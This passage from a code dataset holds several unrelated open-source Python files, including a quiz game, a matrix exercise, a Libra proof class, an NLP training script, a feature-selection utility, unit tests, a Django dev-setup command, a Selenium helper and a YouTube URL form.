AnswersAmount % 2 == 0:\n# \tBoxesAmount = 2\n\n# увеличение номера вопроса, пока они не скажут ауминь\ndef NextQuestion():\n\tglobal QuestionNum\n\tglobal QuestionAmount\n\tif QuestionNum < QuestionAmount:\n\t\tQuestionNum += 1\n\treturn QuestionNum\n\n# проверка ответов пользователя\ndef AnswerVer(BText = None, QuNum = None):\n\tglobal QuestionNum\n\tglobal Trues\n\tglobal Falses\n\t# print(BText)\n\t# if BText != None:\n\t\t# print(f\"correct answer = {questions[QuestionNum-1]['correctAnswer']}\")\n\t\t# print(f\"text = {ButtonArr[BText]['text']}\")\n\ttry:\n\t\tif ButtonArr[BText]['text'] == questions[QuestionNum-1]['correctAnswer']:\n\t\t\tTrues += 1\n\t\telse:\n\t\t\tFalses += 1\n\texcept TypeError:\n\t\treturn Trues, Falses","repo_name":"DmitrHop/Faster-better-smarter","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4390479434","text":"#!/usr/bin/env python3\n\ndef get_first_name(line):\n name = \"\"\n i = 0\n\n while (i < line.index(\" is friends with \")):\n name = name + line[i]\n i = i + 1\n return (name)\n\ndef get_last_name(line):\n name = \"\"\n i = line.index(\" is friends with \") + 17\n\n while (i < len(line)):\n name = name + line[i]\n i = i + 1\n return (name)\n\ndef check_double(tmp, nameContent):\n i = 0\n\n while (i < len(nameContent)):\n if (nameContent[i] == tmp):\n return (0)\n i = i + 1\n return (-1)\n\ndef get_names(fileContent):\n i = 0\n nameContent = []\n\n while (i < len(fileContent)):\n tmp = get_first_name(fileContent[i])\n if (check_double(tmp, nameContent) == -1):\n nameContent.append(tmp)\n tmp = get_last_name(fileContent[i])\n if (check_double(tmp, nameContent) == -1):\n nameContent.append(tmp)\n i = i + 1\n nameContent.sort()\n return (nameContent)\n","repo_name":"tristan-guepeed/MathTek3","sub_path":"302/src/get_names.py","file_name":"get_names.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19250572009","text":"import sys\n\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n arr = [[0]*N for _ in range(N)]\n num = 1\n di = [0, 1, 0, -1] # 우 하 좌 상\n dj = [1, 0, -1, 0]\n i = j = d = 0\n\n while True:\n if (0 <= i+di[d] < N and 0 <= j+dj[d] < N) and arr[i+di[d]][j+dj[d]] == 0:\n arr[i][j] = num\n i += di[d]\n j += dj[d]\n num += 1\n else:\n arr[i][j] = num\n d = (d+1)%4\n\n if N == 1 or num == N**2:\n arr[i][j] = num\n break\n\n print(f'#{tc}')\n for i in arr:\n print(*i)","repo_name":"Hyebin-You/TIL","sub_path":"algorithm problems/swea/1954_snail/1954_snail.py","file_name":"1954_snail.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24155491109","text":"import math\n\nN = int(input())\n\npenalty = 0\ndist = []\nfor i in range(N):\n x, y = input().split()\n x = int(x)\n y = int(y)\n\n dist.append(math.hypot(x, y))\n\n for j in range(len(dist)):\n if dist[i] >= dist[j] and i != j:\n penalty += 1\n\nprint(penalty)\n","repo_name":"vinismarques/codigos-python","sub_path":"arco_flexa.py","file_name":"arco_flexa.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17820896232","text":"from libra.account_address import Address\r\nfrom libra.account_state import AccountState\r\nfrom libra.account_state_blob import AccountStateBlob\r\nfrom libra.event import EventKey\r\nfrom libra.transaction import Version\r\nfrom libra.proof.definition import AccountStateProof\r\nfrom libra.rustlib import ensure\r\nfrom dataclasses import dataclass\r\nfrom typing import Optional, Tuple\r\nfrom canoser import Uint64\r\n\r\n\r\n@dataclass\r\nclass AccountStateWithProof:\r\n # The transaction version at which this account state is seen.\r\n version: Version\r\n # Blob value representing the account state. If this field is not set, it\r\n # means the account does not exist.\r\n blob: Optional[AccountStateBlob]\r\n # The proof the client can use to authenticate the value.\r\n proof: AccountStateProof\r\n\r\n @classmethod\r\n def from_proto(cls, proto):\r\n proof = AccountStateProof.from_proto(proto.proof)\r\n if len(proto.blob.__str__()) > 0:\r\n blob = AccountStateBlob.from_proto(proto.blob)\r\n else:\r\n blob = None\r\n return cls(proto.version, blob, proof)\r\n\r\n def verify(\r\n self,\r\n ledger_info,\r\n version,\r\n address\r\n ):\r\n ensure(\r\n self.version == version,\r\n \"State version ({}) is not expected ({}).\",\r\n self.version,\r\n version\r\n )\r\n self.proof.verify(ledger_info, version, Address.hash(address), self.blob)\r\n\r\n # Returns the `EventKey` (if existent) and number of total events for\r\n # an event stream specified by a query path.\r\n #\r\n # If the resource referred by the path that is supposed to hold the `EventHandle`\r\n # doesn't exist, returns (None, 0). While if the path is invalid, raises error.\r\n #\r\n # For example:\r\n # 1. if asked for DiscoverySetChange event from an ordinary user account,\r\n # this returns (None, 0)\r\n # 2. but if asked for a random path that we don't understand, it's an error.\r\n def get_event_key_and_count_by_query_path(\r\n self,\r\n path: bytes,\r\n ) -> Tuple[Optional[EventKey], Uint64]:\r\n if self.blob is not None:\r\n state = AccountState.deserialize(self.blob.blob)\r\n try:\r\n event_handle = state.get_event_handle_by_query_path(path)\r\n if event_handle is not None:\r\n return (event_handle.key, event_handle.count)\r\n except AttributeError:\r\n return (None, 0)\r\n else:\r\n return (None, 0)\r\n","repo_name":"guoyi03/libra-wallet","sub_path":"libra/proof/account_state_with_proof.py","file_name":"account_state_with_proof.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"34178283076","text":"import os\nimport warnings\nimport json\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\nfrom transformers import AlbertForTokenClassification, AdamW, get_linear_schedule_with_warmup\n\nimport training_params\nfrom dataset_loader import PunctuationDataset\nfrom utils import process_data, folder_with_time_stamps\nimport wandb\n\nwarnings.filterwarnings('ignore')\n\nlog_folder, checkpoint_folder, train_encoder_file_path = folder_with_time_stamps(training_params.LOG_DIR,\n training_params.CHECKPOINT_DIR)\nos.makedirs(log_folder, exist_ok=True)\nos.makedirs(checkpoint_folder, exist_ok=True)\n\nwriter = SummaryWriter(log_folder)\n\ntrain_sentences, train_labels, train_encoder, tag_values = process_data(training_params.TRAIN_DATA)\nvalid_sentences, valid_labels, _, _ = process_data(training_params.VALID_DATA)\n\nwith open(train_encoder_file_path, \"w\") as outfile:\n json.dump(train_encoder, outfile)\n\nprint(\"--------------------------------Tag Values----------------------------------\")\nprint(tag_values)\n\ntrain_dataset = PunctuationDataset(texts=train_sentences, labels=train_labels,\n tag2idx=train_encoder)\nvalid_dataset = PunctuationDataset(texts=valid_sentences, labels=valid_labels,\n tag2idx=train_encoder)\n\ntrain_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=training_params.BATCH_SIZE, num_workers=4)\nvalid_data_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=training_params.BATCH_SIZE, num_workers=4)\n\nmodel = AlbertForTokenClassification.from_pretrained('ai4bharat/indic-bert',\n num_labels=len(train_encoder),\n output_attentions=False,\n output_hidden_states=False)\n\nif training_params.FULL_FINETUNING:\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'gamma', 'beta']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.0}\n ]\nelse:\n param_optimizer = list(model.classifier.named_parameters())\n optimizer_grouped_parameters = [{\"params\": [p for n, p in param_optimizer]}]\n\noptimizer = AdamW(\n optimizer_grouped_parameters,\n lr=training_params.LEARNING_RATE,\n eps=1e-8\n)\n\ntotal_steps = len(train_data_loader) * training_params.EPOCHS\nscheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=total_steps\n)\n\nstarting_epoch = 0\n\nif training_params.LOAD_CHECKPOINT:\n checkpoint = torch.load(training_params.CHECKPOINT_PATH)\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = v.cuda()\n\n starting_epoch = checkpoint['epoch'] + 1\n\n\nif torch.cuda.device_count() > 1:\n print(\"Using \", torch.cuda.device_count(), \"GPUs\")\n model = nn.DataParallel(model)\n\nloss_values, validation_loss_values = [], []\nmodel.cuda()\n\nconfig = {\n \"learning_rate\": training_params.LEARNING_RATE,\n \"batch_size\": training_params.BATCH_SIZE,\n 'num_epochs': training_params.EPOCHS\n}\n\nwandb.init(project=\"test\", config=config)\nwandb.watch(model)\n\n\ntrain_step_count = 0\nfor epoch in range(starting_epoch, training_params.EPOCHS):\n\n model.train()\n total_loss = 0\n\n # Training loop\n tk0 = tqdm(train_data_loader, total=int(len(train_data_loader)), unit='batch')\n tk0.set_description(f'Epoch {epoch + 1}')\n\n for step, batch in enumerate(tk0):\n # add batch to gpu\n for k, v in batch.items():\n batch[k] = v.to(training_params.DEVICE)\n\n b_input_ids, b_input_mask, b_labels = batch['ids'], batch['mask'], batch['target_tag']\n\n model.zero_grad()\n\n outputs = model(b_input_ids, token_type_ids=None,\n attention_mask=b_input_mask, labels=b_labels)\n\n loss = outputs[0].mean()\n loss.backward()\n total_loss += loss.item()\n\n # loss for step\n writer.add_scalar(\"Training Loss- Step\", loss.sum(), train_step_count)\n wandb.log({'Training Loss - Step': loss.sum()}) \n train_step_count += 1\n\n torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=training_params.MAX_GRAD_NORM)\n\n optimizer.step()\n\n scheduler.step()\n\n # Calculate the average loss over the training data.\n avg_train_loss = total_loss / len(train_data_loader)\n print(\"Average train loss: {}\".format(avg_train_loss))\n writer.add_scalar(\"Training Loss\", avg_train_loss, epoch)\n wandb.log({'Training loss': avg_train_loss, 'epoch': epoch})\n\n state = {'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()}\n torch.save(state, checkpoint_folder + '/checkpoint_last.pt')\n # Store the loss value for plotting the learning curve.\n loss_values.append(avg_train_loss)\n\n model.eval()\n # Reset the validation loss for this epoch.\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n predictions, true_labels = [], []\n\n best_val_loss = np.inf\n\n for batch in tqdm(valid_data_loader, total=int(len(valid_data_loader)), unit='batch', leave=True):\n for k, v in batch.items():\n batch[k] = v.to(training_params.DEVICE)\n b_input_ids, b_input_mask, b_labels = batch['ids'], batch['mask'], batch['target_tag']\n\n with torch.no_grad():\n outputs = model(b_input_ids, token_type_ids=None,\n attention_mask=b_input_mask, labels=b_labels)\n logits = outputs[1].detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n\n # Calculate the accuracy for this batch of test sentences.\n eval_loss += outputs[0].mean().item()\n predictions.extend([list(p) for p in np.argmax(logits, axis=2)])\n true_labels.extend(label_ids)\n\n eval_loss = eval_loss / len(valid_data_loader)\n\n if eval_loss < best_val_loss:\n state = {'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()}\n torch.save(state, checkpoint_folder + '/checkpoint_best.pt')\n best_val_loss = eval_loss\n\n validation_loss_values.append(eval_loss)\n print(\"Validation loss: {}\".format(eval_loss))\n writer.add_scalar(\"Validation Loss\", eval_loss, epoch)\n\n wandb.log({'Validation loss': eval_loss})\n\n pred_tags = [tag_values[p_i] for p, l in zip(predictions, true_labels) for p_i, l_i in zip(p, l) if\n tag_values[l_i] != \"PAD\"]\n valid_tags = [tag_values[l_i] for l in true_labels for l_i in l if tag_values[l_i] != \"PAD\"]\n\n val_accuracy = accuracy_score(valid_tags, pred_tags)\n val_f1_score = f1_score(valid_tags, pred_tags, average='macro')\n print(\"Validation Accuracy: {}\".format(val_accuracy))\n print(\"Validation F1-Score: {}\".format(val_f1_score))\n print(\"Classification Report: {}\".format(classification_report(valid_tags, pred_tags, output_dict=True,\n labels=np.unique(pred_tags))))\n writer.add_scalar('Validation Accuracy', val_accuracy, epoch)\n writer.add_scalar('Validation F1 score', val_f1_score, epoch)\n wandb.log({'Validation Accuracy': val_accuracy})\n wandb.log({'Validation F1 Score': val_f1_score})","repo_name":"SukoonRS/punctuation-ITN","sub_path":"sequence_labelling/token_classification/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"43571747060","text":"from collections import namedtuple\nfrom typing import Sequence, Tuple, Dict, List, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import BaseCrossValidator\nfrom sklearn.svm import l1_min_c\n\nfrom ..logging import get_logger\n\nlogger = get_logger(__name__)\n\nResult = namedtuple(\"Result\", [\"score\", \"reg_alpha\", \"is_neg\", \"min_weights\"])\nfeature = Union[str, int, float]\nf_list_type = List[feature]\n\n\ndef scorer(estimator, x_train, y):\n return roc_auc_score(y, estimator.predict_proba(x_train)[:, 1])\n\n\nclass PredefinedFolds(BaseCrossValidator):\n\n def __init__(self, cv_split: Dict[int, Tuple[Sequence[int], Sequence[int]]]):\n \"\"\"\n\n Args:\n cv_split:\n \"\"\"\n self.cv_split = cv_split\n\n def _iter_test_indices(self, x_train: np.ndarray = None, y: np.ndarray = None, groups: np.ndarray = None) -> np.ndarray:\n \"\"\"\n Generates integer indices corresponding to test sets\n\n Args:\n x_train:\n y:\n groups:\n\n Returns:\n\n \"\"\"\n for n in self.cv_split:\n yield self.cv_split[n][1]\n\n def get_n_splits(self, *args, **kwargs) -> int:\n return len(self.cv_split)\n\n\ndef analyze_result(clf: LogisticRegressionCV, features_names: Sequence[str],\n interpreted_model: bool = True) -> List[Result]:\n \"\"\"\n\n Args:\n clf:\n features_names:\n interpreted_model:\n\n Returns:\n\n \"\"\"\n scores = clf.scores_[1]\n cs_scores = scores.mean(axis=0)\n\n cs_len = scores.shape[1]\n coef_ = np.moveaxis(clf.coefs_paths_[1][:, :, :-1], 1, 0)\n\n if interpreted_model:\n cs_negs = (coef_.reshape((cs_len, -1)) <= 0).all(axis=1)\n else:\n cs_negs = [True] * cs_len\n\n cs_min_weights = [pd.Series(coef_[x].min(axis=0), index=features_names) # .sort_values()\n for x in range(cs_len)]\n\n results = [Result(score, c, is_neg, min_weights) for (score, c, is_neg, min_weights) in\n zip(cs_scores, clf.Cs, cs_negs, cs_min_weights)]\n\n return results\n\n\ndef l1_select(interpreted_model: bool,\n n_jobs: int,\n dataset: Tuple[pd.DataFrame, pd.Series],\n l1_grid_size: int,\n l1_exp_scale: float,\n cv_split: Dict[int, Tuple[Sequence[int], Sequence[int]]],\n auc_tol: float = 1e-4\n ) -> Tuple[f_list_type, Result]:\n \"\"\"\n \n Args:\n interpreted_model: \n n_jobs: \n dataset: \n l1_grid_size: \n l1_exp_scale: \n cv_split: \n auc_tol: \n\n Returns:\n\n \"\"\"\n # get grid for cs\n cs = l1_min_c(dataset[0], dataset[1], loss='log', fit_intercept=True) * np.logspace(0, l1_exp_scale, l1_grid_size)\n logger.info('C parameter range in [{0}:{1}], {2} values'.format(cs[0], cs[-1], l1_grid_size))\n # fit model with crossvalidation\n cv = PredefinedFolds(cv_split)\n clf = LogisticRegressionCV(Cs=cs,\n solver='saga',\n tol=1e-5,\n cv=cv,\n penalty='l1',\n scoring=scorer,\n intercept_scaling=10000.,\n max_iter=1000,\n n_jobs=n_jobs,\n random_state=42)\n\n clf.fit(dataset[0].values, dataset[1].values)\n\n # analyze cv results\n result = analyze_result(clf, dataset[0].columns, interpreted_model)\n\n # perform selection\n # filter bad weights models\n scores_neg = [x for x in result if x.is_neg]\n # get top score from avail models\n max_score = max([x.score for x in result])\n # get score with tolerance\n ok_score = max_score - auc_tol\n # select first model that is ok with tolerance\n res = None\n for res in scores_neg:\n if res.score >= ok_score:\n break\n\n # get selected features\n features_fit = [x for (x, y) in zip(dataset[0].columns, res.min_weights) if y != 0]\n logger.info(res)\n\n return features_fit, res\n","repo_name":"ivan-ustinov-idf/AutoScoringFramework","sub_path":"autoscoring/autowoe/lib/selectors/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32868237064","text":"from Simulation.DisasterReader import DisasterReader\nimport unittest\nimport os\nimport re\n\nclass TestDisasterReader(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # os.chdir('..\\..') #Disable for travis (needed for local run)\n cls.reports = {\n \"0\": [\"Test read with no special instances.\"],\n \"1\": [\"Test read with \", \" one special instance\"],\n \"2\": [\"Test at the end of the string \"],\n \"3\": [\"Test 14 \", \" is returned\"],\n \"4\": [\"Test \", \" sigfigs\"],\n \"5\": [\"Test \", \" multiple \",\" specials \"],\n \"6\": [\"Blank test\"],\n \"7\": [\"Blank test\"],\n \"8\": [\"Blank test\"],\n \"9\": [\"Blank test\"]\n }\n cls.ranges = {\n \"0\": [],\n \"1\": [1, 4, 2],\n \"2\": [.2, .4, .01],\n \"3\": [14, 15, 1],\n \"4\": [10, 20, .01],\n \"5\": [1, 10, .5, 1, 10, .5, 1, 10, .5],\n \"6\": [],\n \"7\": [],\n \"8\": [],\n \"9\": []\n }\n cls.answers = {\n \"0\": \"wait\",\n \"1\": \"wait\",\n \"2\": \"wait\",\n \"3\": \"wait\",\n \"4\": \"wait\",\n \"5\": \"wait\",\n \"6\": \"wait\",\n \"7\": \"wait\",\n \"8\": \"wait\",\n \"9\": \"wait\"\n }\n cls.file = 'test'\n os.chdir('Test') # So that test .json file is discovered (instead of top-level files)\n cls.disaster_reader = DisasterReader(cls.file)\n \n @classmethod\n def tearDownClass(cls):\n os.chdir('..')\n \n def test_runs(self):\n raised = False\n try:\n for i in range(len(TestDisasterReader.reports)):\n TestDisasterReader.disaster_reader.get_report(i)\n except:\n raised = True\n self.assertFalse(raised)\n \n def test_basic(self):\n string = TestDisasterReader.disaster_reader.get_report(0)\n self.assertEqual(string, TestDisasterReader.reports[\"0\"][0])\n \n def test_contains_no_bracket_string(self):\n for i in range(len(TestDisasterReader.reports)):\n test = TestDisasterReader.disaster_reader.get_report(i)\n for actual in TestDisasterReader.reports[str(i)]:\n self.assertTrue(actual in test)\n \n def test_num_in_ranges(self):\n for i in range(len(TestDisasterReader.reports)):\n test_string = TestDisasterReader.disaster_reader.get_report(i)\n actuals = TestDisasterReader.reports[str(i)]\n ranges = TestDisasterReader.ranges[str(i)]\n for split_num in range(len(actuals) - 1):\n num = float(test_string.split(actuals[split_num])[1].split(actuals[split_num + 1])[0])\n self.assertTrue(num >= ranges[split_num*3])\n self.assertTrue(num <= ranges[split_num*3 + 1])\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"lmaosimon/DisasterResponse","sub_path":"Test/Simulation/test_disaster_reader.py","file_name":"test_disaster_reader.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8150529149","text":"from django.core.management.base import BaseCommand\r\nfrom django.core.management import call_command\r\nfrom django.conf import settings\r\n\r\nfrom dashboard.models import App, User\r\nfrom timetable.models import Lock as TimetableLock\r\n\r\n\r\nclass Command(BaseCommand):\r\n help = 'Sets up the development environment for Docker'\r\n\r\n def handle(self, *args, **options):\r\n if not settings.DEBUG:\r\n print(\"This must not be run in production!\")\r\n return\r\n\r\n print(\"Setting up the well-known development user...\")\r\n try:\r\n # The email is set from the EPPN header\r\n user = User.objects.get(email='develop@ucl.ac.uk')\r\n except User.DoesNotExist:\r\n user = User(\r\n email='develop@ucl.ac.uk',\r\n full_name='UCL API Developer',\r\n given_name='UCL API',\r\n department='Dept of API Development',\r\n cn='develop',\r\n raw_intranet_groups='ucl-all;ucl-ug;schsci-all',\r\n employee_id='uclapi1'\r\n )\r\n user.save()\r\n\r\n print(\"Setting up the well-known Local OAuth Test app...\")\r\n try:\r\n app = App.objects.get(user=user, name=\"Local OAuth Test\")\r\n except App.DoesNotExist:\r\n app = App(\r\n user=user,\r\n name=\"Local OAuth Test\",\r\n api_token='uclapi-4286bc18b235d86-ab0998cc3a47a9b-07b6dfe234a04bf-97407a655b33ae8', # noqa\r\n client_id='1105308584328350.9460393713696551',\r\n client_secret='251e9f9553bb3b86829c18bf795844d977dedf569b24a70e4d4e753958fcc2f3', # noqa\r\n callback_url='http://localhost:8002/uclapi/callback'\r\n )\r\n app.save()\r\n\r\n print(\r\n \"Well-known user: {}. Well-known app: {}\".format(\r\n user.full_name,\r\n app.name\r\n )\r\n )\r\n\r\n if len(TimetableLock.objects.all()) == 0:\r\n call_command(\"create_timetable_lock\")\r\n\r\n print(\"Building Medium Cache...\")\r\n call_command(\"update_medium\")\r\n\r\n print(\"*** Development environment ready for use! ***\")\r\n","repo_name":"uclapi/uclapi","sub_path":"backend/uclapi/common/management/commands/dev_environment_setup.py","file_name":"dev_environment_setup.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"51"} +{"seq_id":"40017514577","text":"from .image import Image\nfrom .db_images import DbImages\nfrom typing import List\nfrom .fieldnames import *\nfrom ..models.utils import load_model\nfrom ..datasets.utils import load_binary_image_classification_dataset\nfrom torch.utils.data import DataLoader\nfrom datetime import datetime as dt\nimport torch\nfrom ..db.conversions import binary_classification_pred_to_db_value\nfrom tqdm.auto import tqdm\nfrom pathlib import Path\n\n\nclass AiPredictor:\n \"\"\"[summary]\n \"\"\"\n\n def __init__(self,\n ai_name,\n cfg,\n db_images: DbImages,\n ):\n self.ai_name = ai_name\n self.specs = cfg[\"models\"][ai_name]\n self.cfg = cfg\n self.version = self.specs[FIELDNAME_AI_VERSION]\n self.image_scaling = self.specs[FIELDNAME_IMAGE_SCALING]\n self.base_paths_models = Path(cfg[\"base_path_models\"])\n\n def load_model(self, specs = None, _eval: bool = True):\n self.model = None\n if not specs:\n specs = self.specs\n \n print(\"Loading in Prediction Mode!\")\n self.model = load_model(self.ai_name, specs[FIELDNAME_AI_VERSION], _eval, self.base_paths_models)\n if self.model:\n return True\n\n def load_dataset(self, image_list: List[dict]):\n self.dataset = None\n paths = [_[FIELDNAME_IMAGE_PATH] for _ in image_list]\n ids = [str(_[\"_id\"]) for _ in image_list]\n\n self.dataset = load_binary_image_classification_dataset(paths, ids, self.image_scaling, training = False)\n\n if self.dataset:\n return True\n\n def load_dataloader(\n self,\n dataset = None,\n batch_size: int = 100,\n num_workers = 0 ################ Change?\n ):\n if not dataset:\n dataset = self.dataset\n\n self.dataloader = None\n self.dataloader = DataLoader(\n dataset, batch_size=batch_size, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=num_workers, collate_fn=None,\n pin_memory=False, drop_last=True, timeout=0,\n worker_init_fn=None,prefetch_factor=2,\n persistent_workers=False\n )\n\n if self.dataloader:\n return True\n\n\n def predict_images(self, targets: List[str] = None, model = None, dataloader = None, specs = None):\n if not dataloader:\n dataloader = self.dataloader\n\n if not model:\n model = self.model\n\n if not specs:\n specs = self.specs\n\n if not targets:\n targets = [self.ai_name]\n \n creation_date = dt.now()\n print(targets)\n predicted_batches = []\n for batch_images, batch_labels in tqdm(dataloader):\n if torch.cuda.is_available():\n _pred = model(batch_images.to(0))#.to(0))\n else:\n _pred = model(batch_images)\n \n update = binary_classification_pred_to_db_value(\n _pred,\n batch_labels,\n version = specs[FIELDNAME_AI_VERSION],\n targets = targets,\n creation_date=creation_date)\n \n predicted_batches.append(update)\n \n return targets, predicted_batches\n\n ","repo_name":"Maddonix/ukw-ml-tools","sub_path":"src/ukw_ml_tools/_depreceated/classes/ai_predictor.py","file_name":"ai_predictor.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21891092192","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('movie_list/', views.movie_list),\n path('movie_detail//', views.movie_detail),\n path('worldcup/', views.random_worldcup),\n path('worldcup//', views.worldcup_detail),\n path('genre/', views.genre),\n path('genre//', views.genre_detail),\n path('genre_movie_list//', views.genre_movie_list),\n\n]","repo_name":"KIMDONGHYEON003/-WEB-Life-like-a-movie","sub_path":"final-pjt-back/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31439914271","text":"\"\"\"\nhttps://developers.google.com/web/updates/2017/04/headless-chrome\nhttps://copilot.github.com/\nhttps://www.selenium.dev/pt-br/documentation/webdriver/waits/\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom pathlib import Path\n\n# caminho raiz do projeto\nROOT_FOLDER = Path(__file__).parent.parent.parent.parent\nCHROME_DRIVER_PATH = ROOT_FOLDER / 'chromedriver'\n\n\ndef make_chrome_browser(*options: str) -> webdriver.Chrome:\n chrome_options = webdriver.ChromeOptions()\n if options is not None:\n for op in options:\n chrome_options.add_argument(op)\n\n chrome_service = Service(executable_path=CHROME_DRIVER_PATH)\n\n return webdriver.Chrome(\n service=chrome_service,\n options=chrome_options\n )\n\n\nif __name__ == '__main__':\n # options = ('--headless',)\n ops = ('--disable-gpu', '--no-sandbox')\n chrome = make_chrome_browser(*ops)\n\n chrome.get('https://www.google.com')\n\n input_search = chrome.find_element(by=By.NAME, value='q')\n input_search.send_keys('palmeiras')\n input_search.send_keys(Keys.ENTER)\n\n # chrome.quit()\n","repo_name":"MatheusAriel/estudos_python","sub_path":"modulos/SELENIUM_/utils/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"16892076891","text":"from django import forms\nfrom .models import Incident\nfrom django.forms import Textarea,DateTimeInput\n\n\nfrom pytube import YouTube\nfrom pytube.exceptions import RegexMatchError\n\n\n\nclass IncidentForm(forms.ModelForm):\n\n class Meta:\n model = Incident\n fields = '__all__'\n widgets = {\n 'description': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'incident_location': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'cause': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'action_taken': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'time' : DateTimeInput(attrs={})\n }\n\n\nclass YoutubeForm(forms.Form):\n url=forms.CharField( required=True,widget=forms.Textarea(attrs={'cols':80,'rows':1,'placeholder':'Enter Url here'}))\n\n def clean(self):\n video_url=self.cleaned_data.get('url')\n try: \n yt = YouTube(video_url)\n except RegexMatchError:\n raise forms.ValidationError('The Url you entered is not correct')\n return self.cleaned_data","repo_name":"Moinkhan8439/mk-site","sub_path":"internal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35213613094","text":"#\n# @lc app=leetcode id=323 lang=python3\n#\n# [323] Number of Connected Components in an Undirected Graph\n# @lc code=start\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n if not edges:\n return n \n \n # use dict to store edges information, easy to find neigbors for a given node\n neighbors_dict = {k: [] for k in range(n)}\n for edge in edges:\n node1, node2 = edge[0], edge[1]\n neighbors_dict[node1].append(node2)\n neighbors_dict[node2].append(node1)\n \n visited = set() \n count = 0\n \n for node in range(n):\n # check if curr node is in new component\n if node not in visited:\n count += 1\n else:\n continue\n \n # new component: notate all connected nodes to visited\n # dfs\n stack = [node]\n while stack:\n curr_node = stack.pop()\n neighbors = neighbors_dict[curr_node]\n for neighbor in neighbors:\n if neighbor not in visited: \n visited.add(neighbor)\n stack.append(neighbor)\n \n return count \n\n# @lc code=end\n\n","repo_name":"ck2w/Leetcode","sub_path":"py/0323.number-of-connected-components-in-an-undirected-graph.py","file_name":"0323.number-of-connected-components-in-an-undirected-graph.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12293497561","text":"import pygame\n\n\nclass Block(pygame.sprite.Sprite):\n \"\"\" This class is used to create a Block object to be used in a game.\n \"\"\"\n\n#############################################################################################################\n def __init__(self, x, y, color, width, height):\n \"\"\" Creates a Block object with the given parameters.\n\n Args:\n x (int): x coordinate of the top left corner of the block\n y (int): y coordinate of the top left corner of the block\n color (tuple): color of the block\n width (int): width of the block\n height (int): height of the block\n \"\"\"\n\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n","repo_name":"pumasa/OOP_project","sub_path":"Objects/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14632484962","text":"# -*- coding: utf-8 